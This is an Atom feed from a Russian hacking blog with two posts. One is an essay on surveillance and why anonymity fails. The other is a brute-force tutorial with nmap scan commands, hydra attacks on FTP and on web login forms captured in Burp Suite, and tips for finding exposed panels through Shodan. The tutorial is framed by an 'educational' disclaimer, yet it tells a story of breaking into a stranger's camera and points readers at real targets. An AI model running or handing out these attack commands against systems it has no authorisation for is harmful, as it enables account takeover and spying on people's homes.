<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>Editor</title><subtitle>Our channel: @hack2day</subtitle><author><name>Editor</name></author><id>https://teletype.in/atom/hack2day</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/hack2day?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@hack2day?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hack2day"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/hack2day?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-06-07T00:05:01.890Z</updated><entry><id>hack2day:0vwWlHuYieR</id><link rel="alternate" type="text/html" href="https://teletype.in/@hack2day/0vwWlHuYieR?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hack2day"></link><title>Почему тебе не стать анонимным</title><published>2023-06-09T20:34:31.801Z</published><updated>2023-06-12T06:26:06.054Z</updated><summary type="html">Приветствую! Анонимность — одна из самых востребованных вещей в наше время. С приходом искусственного интеллекта даже приватность наших действий ставится под огромную угрозу, потому что такие системы могут анализировать и контролировать безграничные потоки данных. Представьте, что будет если подобные инструменты массово начнут применять для установления личности по ту сторону экрана. За нами уже давно следят, шутки об &quot;личном ФСБ'шнике&quot; — далеко не юмор, а суровая реальность. Вопрос стоит только в обработке полученной информации, и я вам докажу это. Целью этой статьи будет сообщить об проблемах, которые не решатся использованием анонимных сетей, сокрытием цифрового отпечатка и так далее. Не забывайте подписываться на наш энтузиастский...</summary><content type="html">
  &lt;p id=&quot;rxwc&quot; data-align=&quot;center&quot;&gt;Приветствую! Анонимность — одна из самых востребованных вещей в наше время. С приходом искусственного интеллекта даже приватность наших действий ставится под огромную угрозу, потому что такие системы могут анализировать и контролировать безграничные потоки данных. Представьте, что будет если подобные инструменты массово начнут применять для установления личности по ту сторону экрана. За нами уже давно следят, шутки об &amp;quot;личном ФСБ&amp;#x27;шнике&amp;quot; — далеко не юмор, а суровая реальность. Вопрос стоит только в обработке полученной информации, и я вам докажу это. Целью этой статьи будет сообщить об проблемах, которые не решатся использованием анонимных сетей, сокрытием цифрового отпечатка и так далее. Не забывайте подписываться на &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;наш энтузиастский проект&lt;/strong&gt;&lt;/a&gt;. Всегда будем рады новым людям &lt;a href=&quot;http://t.me/Hack2day_Chat&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;в чате&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;6kBB&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;&lt;em&gt;ДИС&lt;code&gt;КЛЕЙ&lt;/code&gt;МЕР&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;i7Dw&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;Вся информация, содержащаяся в данной статье, предоставляется исключительно в целях образования и общего информирования. Автор не несет ответственности за любые действия, которые могут быть предприняты на основе этой информации, а также не гарантирует ее полноту, точность или актуальность.&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;XP9f&quot; data-align=&quot;center&quot;&gt;За тобой уже следят&lt;/h2&gt;
  &lt;p id=&quot;r1VH&quot; data-align=&quot;center&quot;&gt;Читая эту статью, любезный Google тщательно изучает твоё вовлечение, чтобы потом продавать твое внимание рекламодателям за деньги. Вы, наверняка задавались таким вопросом: в чем выгода торговать готовыми в сборке устройствами практически по себестоимости? Мои дорогие, покупая смартфон, вы самостоятельно подписываете контракт, который отбирает у вас собственность на частную жизнь. Основная прибыль всех компаний вытекает из долгосрочной перспективы на монетизацию ваших данных. На просторах сети вы могли встретить сотни видеороликов, где телефон на основе общения рядом с ним выдаёт таргетированную рекламу. И это не миф, это — суровая реальность. Мы все давно под прицелом большого брата и в лучшую сторону ситуация уж точно не изменится. Давайте рассмотрим процессоры &lt;a href=&quot;https://www.nitrokey.com/news/2023/smartphones-popular-qualcomm-chip-secretly-share-private-information-us-chip-maker&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Snapdragon&lt;/strong&gt;&lt;/a&gt;, которые каждый раз сливают себе на сервера информацию об: списке установленного программного обеспечения, IP-адресе, уникальном отпечатке устройства и ещё 9 пунктах, которые указаны в &lt;a href=&quot;https://www.nitrokey.com/news/2023/smartphones-popular-qualcomm-chip-secretly-share-private-information-us-chip-maker&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;источнике&lt;/strong&gt;&lt;/a&gt;. Попрошу заметить, это ДАЖЕ БЕЗ Google! Самое забавное в том, что вся информация передаётся через незащищенный протокол HTTP, который попросту не обладает шифрованием. Спросите, зачем? Чтобы ваш провайдер смог прочитать вашу личность как книгу и записал эту информацию в отдельную папочку, которая повлияет на вашу деанонимизацию. К слову, &lt;strong&gt;&lt;em&gt;СОРМ&lt;/em&gt;&lt;/strong&gt; (&lt;code&gt;Система оперативно-розыскных мероприятий&lt;/code&gt;) работает практически по аналогичной схеме. А теперь представь, что будет если этот 0.01% который мы затронули будет контролировать ИИ? К слову, сейчас даже старые модели &amp;quot;оригинальных&amp;quot; Nokia идут с &amp;quot;переработанными&amp;quot; прошивками. Раз мы уже говорим на тему телефонов, стоит упомянуть то, что КАЖДЫЙ сайт может узнать когда ты спишь, когда сидишь в туалете, когда летишь в самолёте, etc.. Виной этому — датчик акселерометра. Он используется для определения ориентации экрана, но умельцы научились считывая колебания определять ваш пол по голосу и даже попытались заменить им микрофон.. Благо, у них не получилось, но и исследование далеко не самое свежее. Такие технологии во всю силу применяет компания &amp;quot;&lt;code&gt;Meta&lt;/code&gt;&amp;quot; с целью выдачи соответствующей ленты в Instagram, Facebook.&lt;br /&gt;А что насчёт несъёмности аккумулятора? Мы буквально не можем обесточить устройство, оно превращается в настоящий жучок. Не затрагиваю даже &lt;code&gt;baseband&lt;/code&gt;, оставим это на следующие материалы подобной тематики. &lt;/p&gt;
  &lt;p id=&quot;PhGq&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;IpBN&quot; data-align=&quot;center&quot;&gt;Твой максимум — потреблять&lt;/h2&gt;
  &lt;p id=&quot;NOdb&quot; data-align=&quot;center&quot;&gt;Предположим, ты — человек, который всегда топил за свободу и приватность. У тебя на устройстве стоит строго opensource Debian система, никакого проприетарного программного обеспечения, все твои диски зашифрованы и имеют стойкие пароли. Что может пойти не так? Все не так радужно. Мы создаем только видимость безопасности, но так же остаемся обычными потребителями, которые никогда не станут углубляться в недры системы. Если я напишу вам что Linux это охренеть как круто и безопасно, вы, скорее всего без раздумий примете эту информацию за действительность, потому что у вас нет выбора=) Все наши знания формируются на анализе информации других людей, для которых это зачастую обычный бизнес. Такое можно было наблюдать с браузером Sphere, об котором буквально трещали с каждого угла, а он оказался ловушкой от спец. служб. Рассмотрим что-то близкое к нам? Например, systemd, который я считаю огромной угрозой, хоть и многие перечат мне. Вкратце: это программа, которая управляет работой компьютера с операционной системой Linux. Она отвечает за запуск и остановку других программ, называемых службами, и следит за их работой. Так же, по стандартам, systemd имеет полностью открытый код. В чем же угроза то? Из-за сложного исходного кода, никто не может провести нормальный аудит безопасности и в systemd находятся эксплойты буквально каждые три месяца! Теперь задумайтесь, действительно нужен ли вам opensource, когда для &amp;quot;обычных потребителей&amp;quot; в роде нас это не является никаким гарантом безопасности? Едем дальше.. Как ты хочешь создавать анонимное пространство, когда весь твой компьютер — закрытый ящик? Да, поговорим о &amp;quot;блобах&amp;quot;. Это те самые закрытые уголки, об которых ты никогда не подумаешь. Твоя материнская плата, твой процессор, даже чёртовы драйвера мышки в 99% имеют закрытый исходный код. Intel, NVIDIA и AMD были подвергнуты эксплойтам прямо на уровне железа и при этом не один раз! Как думаешь, было бы круто взять под контроль пол планеты умелым спец. службам Америки найдя всего одну уязвимость? К сожалению, они не раз были замечены за безумной слежкой. И, мы не сможем получить достоверные данные об этом, потому что такая серьёзная информация не будет доступна обычным смертным.&lt;/p&gt;
  &lt;p id=&quot;Fr4R&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;2Yi3&quot; data-align=&quot;center&quot;&gt;Итоги&lt;/h2&gt;
  &lt;p id=&quot;wsBi&quot; data-align=&quot;center&quot;&gt;Мы рассмотрели одни из основных угроз анонимности, не затрагивая тайминг атаки, TEMPEST, PAA, атаки на звуковых волнах и прочие. Если искусственный интеллект начнут массово применять для контроля всех этих данных — анонимность или даже приватность перестанут существовать вовсе. Предлагаю вам присоединится &lt;a href=&quot;https://t.me/hack2day_chat&quot; target=&quot;_blank&quot;&gt;к нашему чату&lt;/a&gt;, чтобы обсудить эту тему вместе. Всем мир!&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;RrPF&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;dea4&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;EHHk&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

</content></entry><entry><id>hack2day:mYfvfkPANZm</id><link rel="alternate" type="text/html" href="https://teletype.in/@hack2day/mYfvfkPANZm?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hack2day"></link><title>Атака bruteforce для каждого</title><published>2023-05-26T15:11:45.158Z</published><updated>2023-05-27T19:15:59.642Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img2.teletype.in/files/90/f1/90f11c01-fafd-49d4-b1d2-b667db86e370.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img2.teletype.in/files/1f/71/1f711c60-1ae9-4fd6-adbd-199ffacfd706.png&quot;&gt;Приветствую! В этом уроке мы познакомимся с двумя новыми инструментами — hydra и nmap. Также, затронем работу в burpsuite. Совместив их вместе, вы станете умельцами одного из самых опасных методов атаки — bruteforce. Приятного чтения, дальше — больше! Не забывайте подписываться на наш проект, который создан не ради денег. Будем рады новичкам в чате.</summary><content type="html">
  &lt;p id=&quot;MOpR&quot; data-align=&quot;center&quot;&gt;Приветствую! В этом уроке мы познакомимся с двумя новыми инструментами — &lt;code&gt;hydra&lt;/code&gt; и &lt;code&gt;nmap&lt;/code&gt;. Также, затронем работу в &lt;code&gt;burpsuite&lt;/code&gt;. Совместив их вместе, вы станете умельцами одного из самых опасных методов атаки — bruteforce. Приятного чтения, дальше — больше! Не забывайте подписываться на &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;наш проект, который создан не ради денег&lt;/strong&gt;&lt;/a&gt;. Будем рады новичкам &lt;a href=&quot;http://t.me/Hack2day_Chat&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;в чате&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;6kBB&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;&lt;em&gt;ДИС&lt;code&gt;КЛЕЙ&lt;/code&gt;МЕР&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;i7Dw&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;Вся информация, содержащаяся в данной статье, предоставляется исключительно в целях образования и общего информирования. Автор не несет ответственности за любые действия, которые могут быть предприняты на основе этой информации, а также не гарантирует ее полноту, точность или актуальность.&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;jXx5&quot; data-align=&quot;center&quot;&gt;Сканируем IP на открытые порты&lt;/h2&gt;
  &lt;p id=&quot;vUIL&quot; data-align=&quot;center&quot;&gt;Производить это действие мы будем используя утилиту &lt;code&gt;nmap&lt;/code&gt;. В качестве подопытного будет мой личный сайт, IP которого уже известен. Сканировать порты нужно для того, чтобы узнать, какие службы работают на этом адресе помимо веб-ресурса, как в нашем случае. Это могут быть принтеры, камеры, базы данных и даже сервера онлайн игр. Расскажу вам забавный кейс: найдя IP нужного мне пользователя в слитой базе данных форума, оказалось что он статичный. Статичный = привязан к одному устройству и не меняется продолжительное время. Казалось бы, что это даст? Просканировав его на открытые порты, мне удалось обнаружить некое устройство, работающее на порту &amp;quot;&lt;code&gt;8080&lt;/code&gt;&amp;quot;. Этот порт в основном используют для размещения сайтов (HTTP). Перейдя по ссылке &amp;quot;&lt;code&gt;192.168.*.*:8080&lt;/code&gt;&amp;quot; меня встретила страница авторизации камеры. Далее дело за малым: две строчки в терминал, 30 минут времени и я наблюдаю как в гостиной убирается какая-то женщина. Естественно, это все вымысел. Вот это я сказочник! Так вот, нам потребуется ввести в терминал подобную команду, заменив значения на свои. &lt;strong&gt;Выполнение от имени&lt;/strong&gt; &lt;strong&gt;root&lt;/strong&gt;!&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;xNwW&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;sudo nmap -p- -sV -sS -T4 192.168.1.1&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;MpIA&quot; data-align=&quot;center&quot;&gt;Теперь давайте разберём её: &amp;quot;&lt;code&gt;-p-&lt;/code&gt;&amp;quot; используется для полной проверки всех портов в диапазоне от 0 до 65535. Параметр &amp;quot;&lt;code&gt;-sV&lt;/code&gt;&amp;quot; расскажет о версиях сервиса. &amp;quot;&lt;code&gt;-sS&lt;/code&gt;&amp;quot; используется для более обширных результатов. Путём лживых рукопожатий с сервером он покажет нам какие порты были отфильтрованы, а какие просто открыты. &amp;quot;&lt;code&gt;-T&lt;/code&gt;&amp;quot; — скорость сканирования, от 1 до 5. Чтобы не уронить сервер от флуда запросами, советуется использовать более низкие значения. В основном, команда которую мы рассмотрели выше — база, её нужно записать в отдельный текстовый документ. Если вы хотите пройтись только по популярным портам (более быстрый вариант) — используйте параметр &amp;quot;&lt;code&gt;-F&lt;/code&gt;&amp;quot;, предварительно убрав &amp;quot;&lt;code&gt;-p-&lt;/code&gt;&amp;quot;. После успешного выполнения, мы увидим подобную картину (на скриншоте я использовал режим быстрого сканирования):&lt;/p&gt;
  &lt;figure id=&quot;gxV2&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/1f/71/1f711c60-1ae9-4fd6-adbd-199ffacfd706.png&quot; width=&quot;694.3396551724138&quot; /&gt;
    &lt;figcaption&gt;&lt;strong&gt;результат сканирования на открытые порты&lt;/strong&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;SN88&quot; data-align=&quot;center&quot;&gt;Обнаружено много интересных протоколов, но мы остановимся на &lt;code&gt;FTP&lt;/code&gt;. Это сервер, на котором зачастую хранятся данные. Его можно сравнить с облаком. Кстати, метод передачи файлов (&lt;code&gt;FTP&lt;/code&gt;) давно устарел и не имеет никакого шифрования, хоть и очень часто встречается даже на крупных ресурсах. Настоятельно советую использовать более надёжные варианты!&lt;/p&gt;
  &lt;p id=&quot;ZsKo&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;V20G&quot; data-align=&quot;center&quot;&gt;Знакомство с hydra&lt;/h2&gt;
  &lt;p id=&quot;61I9&quot; data-align=&quot;center&quot;&gt;И нет, я не оставлю реферальную ссылку по которой скидка на соль -15%=)&lt;br /&gt;Hydra — мощнейший инструмент для брутфорса, с его помощью можно брутить практически все то, что использует для авторизации логин и пароль. Кстати, есть две версии: консольная и графическая. Я буду показывать работу в консольной, но вы можете самостоятельно ознакомиться с графической, благо, там все максимально упростили. С портом мы определились, будем бить 21 (&lt;code&gt;FTP&lt;/code&gt;). Но перед этим нам нужно найти то, чем бить=) Речь о базе логинов/паролей. Хочу обратить ваше внимание на то, что это дело индивидуальное. Например, в протоколе RDP (Windows Server) часто используют логин &amp;quot;Administrator&amp;quot;, и самое интересное в том, что в отличие от страны он меняется. В Италии — &amp;quot;Administrador&amp;quot;, в Швеции — &amp;quot;Administratör&amp;quot;. Думаю, суть понятна. Если вы брутите какую-то камеру, обратите внимание на её модель и обратитесь к документации производителя. В 90% там будет указан стандартный логин, это 50% работы. &lt;br /&gt;В Kali Linux по умолчанию есть словарь &amp;quot;&lt;code&gt;rockyou&lt;/code&gt;&amp;quot;. Он предоставляется в запакованном виде. Чтобы воспользоваться им, введите эти команды:&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;2AY8&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;sudo gunzip /usr/share/wordlists/rockyou.txt.gz&lt;br /&gt;cd /usr/share/wordlists/&lt;br /&gt;sudo mv rockyou.txt /home/{username}&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;blockquote id=&quot;P4VE&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;Командой &amp;quot;&lt;code&gt;gunzip&lt;/code&gt;&amp;quot; мы распаковали архив, далее перешли в директорию с файлом и перенесли его в &amp;quot;домашнюю папку&amp;quot; по пути &lt;code&gt;/home/{username}&lt;/code&gt;&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;figure id=&quot;K7lH&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/01/d2/01d23fa1-5a8e-45c1-84df-8a1ae8705573.png&quot; width=&quot;664.6666666666666&quot; /&gt;
    &lt;figcaption&gt;&lt;strong&gt;читаем содержимое командой &amp;quot;cat&amp;quot;, чтобы удостовериться&lt;/strong&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;uWwc&quot; data-align=&quot;center&quot;&gt;С паролями разобрались, осталось найти только логин. Мы можем указать целый лист популярных, но как я и советовал выше, точите его под таргет. Вы можете сканировать ресурсы инструментами с прошлой статьи для поиска открытых лог-файлов, которые с огромной вероятностью содержат в себе нужные юзернеймы. Если не знакомы с протоколом/сервисом, воспользуйтесь поисковиками, сконструировав подобный запрос: &amp;quot;&lt;code&gt;{ваш сервис} default credentials&lt;/code&gt;&amp;quot;.&lt;br /&gt;Крайне советую вам &lt;a href=&quot;https://github.com/danielmiessler/SecLists/&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;этот гит&lt;/strong&gt;&lt;/a&gt;, на котором размещено все для подобных целей: от списка логинов, до payload&amp;#x27;ов. Думаю, достойная закладка в вашем браузере.&lt;br /&gt;В моем случае будет загружен список из 2 логинов, которые я получил &lt;s&gt;в логах сервера&lt;/s&gt; интуицией. Выполняем такую команду, заменяя значения на свои:&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;FBUy&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;sudo hydra -L usernames.txt -P rockyou.txt 192.168.0.1 ftp -t 30&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;figure id=&quot;Tsm0&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d4/31/d4311d22-b0fe-4260-9d7f-a8b45396d2c1.png&quot; width=&quot;656&quot; /&gt;
    &lt;figcaption&gt;&lt;strong&gt;bruteforce атака на ftp сервер&lt;/strong&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;kR7R&quot; data-align=&quot;center&quot;&gt;Теперь давайте разбирать команду. Параметр &amp;quot;&lt;code&gt;-L&lt;/code&gt;&amp;quot; указывает на список логинов. Если мы работаем с целью, логин которой известен — вводим маленькую &amp;quot;&lt;code&gt;-l&lt;/code&gt;&amp;quot;, после чего указываем юзернейм. С параметром &amp;quot;&lt;code&gt;-P&lt;/code&gt;&amp;quot; все аналогично, только речь об паролях. Следующим параметром указывается IP таргета который &amp;quot;пентестим&amp;quot;. Далее, протокол. У меня это &lt;code&gt;FTP&lt;/code&gt;, вы должны заменить на свой. Кстати, если сервис работает не на обычном порту, вы также можете указать его самостоятельно параметром &amp;quot;&lt;code&gt;-s&lt;/code&gt;&amp;quot;, последующим значением вводим нужный порт. Один из важных аргументов это &amp;quot;&lt;code&gt;-t&lt;/code&gt;&amp;quot;, который указывает кол-во потоков. Вы должны понимать, что некоторые конфигурации серверов не всегда выдерживают долбёжку в панель и могут падать/ограничивать количество запросов. Моим оптимальным значением будет 30. Если вы заметили что скорость существенно низкая, нужно понизить этот параметр и попробовать вновь. Скорее всего, сервер обнаружил атаку и установил вам определённые &amp;quot;лимиты&amp;quot;. Если вы хотите вывод логов в консоль, добавьте аргумент &amp;quot;&lt;code&gt;-V&lt;/code&gt;&amp;quot;&lt;br /&gt;Ура! Команда на целевой таргет полностью готова и её можно сохранять в текстовый документ. При успехе, мы получим строку в консоли с данными.&lt;/p&gt;
  &lt;p id=&quot;WMzN&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;TlYw&quot; data-align=&quot;center&quot;&gt;Брутим логины/пароли на сайте&lt;/h2&gt;
  &lt;p id=&quot;etcu&quot; data-align=&quot;center&quot;&gt;Это, наверное, будет самый полезный навык в работе. Практически все камеры используют авторизацию через &lt;strong&gt;HTTP страницу&lt;/strong&gt;. В этом примере будет участвовать &lt;strong&gt;web-panel&lt;/strong&gt; известного стиллера, которую я написал самостоятельно и поднял на своем сервере, конечно же. Кстати, вы можете самостоятельно найти несколько тысяч подобных, сконструировав правильный запрос в &lt;a href=&quot;https://www.criminalip.io&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;criminalip.io&lt;/strong&gt;&lt;/a&gt;, &lt;a href=&quot;http://Shodan.io&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Shodan.io&lt;/strong&gt;&lt;/a&gt; и подобных сайтах. Выглядят все они примерно вот так:&lt;/p&gt;
  &lt;figure id=&quot;cvgs&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/de/ca/decab22f-cdad-484d-9483-66664a9e0ebb.png&quot; width=&quot;608&quot; /&gt;
    &lt;figcaption&gt;&lt;strong&gt;стартовая страница авторизации таргета&lt;/strong&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;LZui&quot; data-align=&quot;center&quot;&gt;Единственное, что у нас есть: поля для авторизации и кнопка. Первым делом, нужно отловить сам запрос к серверу во время отправки логина и пароля. Для этого я использую утилиту &amp;quot;&lt;code&gt;Burpsuite&lt;/code&gt;&amp;quot;. Не будем рассматривать весь функционал, обо нём можно написать книгу да и статья не об этом. Найдите &amp;quot;&lt;code&gt;Burpsuite&lt;/code&gt;&amp;quot; через поиск приложений, он предустановлен в системе по умолчанию. Я буду использовать платную версию, но для нашей задачи отличия будут минимальными. Переходим во вкладку &amp;quot;&lt;code&gt;Target&lt;/code&gt;&amp;quot; и кликаем &amp;quot;&lt;code&gt;Open browser&lt;/code&gt;&amp;quot;. &lt;/p&gt;
  &lt;figure id=&quot;Yv21&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/bd/09/bd09560f-5f42-48df-a39f-4a402c96f6d3.png&quot; width=&quot;650&quot; /&gt;
    &lt;figcaption&gt;&lt;strong&gt;демонстрация вкладки &amp;quot;Tagret&amp;quot;&lt;/strong&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;VuKf&quot; data-align=&quot;center&quot;&gt;У нас откроется обычный браузер на основе Chromium. Перейдите на сайт, который нужно &amp;quot;пентестить&amp;quot; и авторизуйтесь любыми данными. Далее, нужно вернуться в burp и найти запрос типа &amp;quot;&lt;code&gt;post&lt;/code&gt;&amp;quot;. Я выделил его у себя оранжевым цветом. Нам нужно скопировать строчку, в которой передались данные авторизации. У меня она выглядит так: &lt;code&gt;username=admin&amp;amp;password=12345678&lt;/code&gt;&lt;br /&gt;Так же нужно скопировать параметр &amp;quot;&lt;code&gt;URL&lt;/code&gt;&amp;quot;, а именно эту часть: &lt;code&gt;/index.php?auth&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;3BwX&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/dd/12/dd12f539-ec77-434a-8237-afde0649c65e.png&quot; width=&quot;683.9891808346214&quot; /&gt;
    &lt;figcaption&gt;&lt;strong&gt;пример отловленного post запроса с burpsuite&lt;/strong&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;UUe9&quot; data-align=&quot;center&quot;&gt;По итогу, несколько потраченных минут и мы можем начать наш перебор. Воспользуемся все той же гидрой. Из этих данных мы составим такую команду:&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;BuJd&quot; data-align=&quot;center&quot;&gt;&lt;code&gt;$ hydra -L usernames.txt -P rockyou.txt 192.168.0.1 http-post-form &amp;quot;/index.php?auth:username=^USER^&amp;amp;password=^PASS^:Error login or password&amp;quot; -V&lt;/code&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;GJGD&quot; data-align=&quot;center&quot;&gt;Базовые параметры разбирать не будем, так как сделали это выше. В скобочки мы поместили страницу, которая будет обрабатывать запрос. После двоеточия идёт наше &amp;quot;тело запроса&amp;quot;, вместо данных авторизации я указал &lt;code&gt;^USER^&lt;/code&gt;&amp;amp;&lt;code&gt;^PASS^&lt;/code&gt; — думаю, логично за что это отвечает. Эти места будут заменяться данными для bruteforce атаки. (&lt;code&gt;^USER^&lt;/code&gt; — логин, &lt;code&gt;^PASS^&lt;/code&gt; — пароль) Далее, указано сообщение, которое появляется на экране в случае ввода невалидных данных. То есть, если сайт вернёт нам ответ, в котором не будет содержаться &amp;quot;&lt;code&gt;Error login or password&lt;/code&gt;&amp;quot; — аккаунт будет сочтён за рабочий. Параметр &amp;quot;&lt;code&gt;-V&lt;/code&gt;&amp;quot; будет выводить все попытки авторизации в консоль, (даже неудачные) можете не использовать его.&lt;/p&gt;
  &lt;figure id=&quot;4QTe&quot; class=&quot;m_custom&quot; data-caption-align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/76/dd/76dd62ae-bbd7-4e9a-b67b-363013ce648e.png&quot; width=&quot;693.6135265700483&quot; /&gt;
    &lt;figcaption&gt;&lt;strong&gt;брутфорс авторизации сайта используя метод http-post-form&lt;/strong&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;T1Ga&quot; data-align=&quot;center&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;CLBW&quot; data-align=&quot;center&quot;&gt;Итоги&lt;/h2&gt;
  &lt;p id=&quot;0lZh&quot; data-align=&quot;center&quot;&gt;Теперь, нам не составит труда подключиться к своей камере, если мы забыли пароль=) Мы умеем проверять свои сервера на уязвимость к брутфорсу, свои самописные web-панели, да и в конце концов, школьные электронные журналы, которые создали специально для проверки. Благодарю всех за прочтение, если статья оказалась вам полезной — пожалуйста, подпишитесь на наш &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Telegram&lt;/strong&gt;&lt;/a&gt;. У нас сейчас даже рекламы нет, это будет лучшая благодарность. Мирного неба!&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;RrPF&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;dea4&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;EHHk&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;НАШ КАНАЛ: &lt;a href=&quot;https://t.me/hack2day&quot; target=&quot;_blank&quot;&gt;t.me/hack2day&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

